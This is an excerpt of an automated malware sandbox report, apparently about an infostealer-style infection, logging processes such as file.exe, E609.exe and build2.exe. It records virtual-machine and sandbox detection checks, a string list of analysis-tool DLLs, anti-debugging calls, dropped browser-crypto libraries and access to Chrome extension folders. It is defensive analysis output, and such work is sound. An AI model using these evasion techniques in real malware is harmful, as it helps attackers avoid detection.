Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\rujtcgu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Source: rujtcgu, 00000004.00000002.1982713687.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: rujtcgu, 00000022.00000002.2344189167.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOKC
Source: build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: file.exe, 00000000.00000002.1710176306.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK'
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_0497771C rdtsc 9_2_0497771C
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 15_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 10_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free, 15_2_0040E670
Source: C:\Users\user\AppData\Local\Temp\E609.exe Thread delayed: delay time: 700000 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 428 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1382 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 614 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 743 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 745 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 414
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 395
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Windows\explorer.exe TID: 5088 Thread sleep time: -138200s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6516 Thread sleep time: -61400s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 6472 Thread sleep time: -30900s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe TID: 6596 Thread sleep time: -700000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 2164 Thread sleep count: 183 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 2164 Thread sleep time: -41175s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 10_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 15_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 15_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 15_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\E609.exe Thread delayed: delay time: 700000 Jump to behavior
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: explorer.exe, 00000001.00000000.1690636366.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008E46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW00
Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008DAD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWUSndClass H
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053964742.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware_
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D4A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000002A.00000002.2897813212.000000000D0CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1688547736.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yt
Source: E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1690636366.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00op
Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000l
Source: explorer.exe, 0000002A.00000002.2880479170.0000000004E80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXT_RVMWare
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008E66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterL
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4NECVMWar VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: build2.exe, 00000013.00000002.2688985595.00000000051F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: explorer.exe, 0000002A.00000002.2891687444.0000000009001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000Pca
Source: explorer.exe, 0000002A.00000003.2739474666.000000000D17E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~1HI4
Source: build2.exe, 00000013.00000002.2688985595.00000000051F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareD64
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8
Source: explorer.exe, 00000001.00000000.1688547736.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1690075566.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JVMware V
Source: explorer.exe, 0000002A.00000003.2739943356.000000000D176000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\E609.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\E609.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_0497771C rdtsc 9_2_0497771C
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00424168 _memset,IsDebuggerPresent, 10_2_00424168
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 10_2_0042A57A
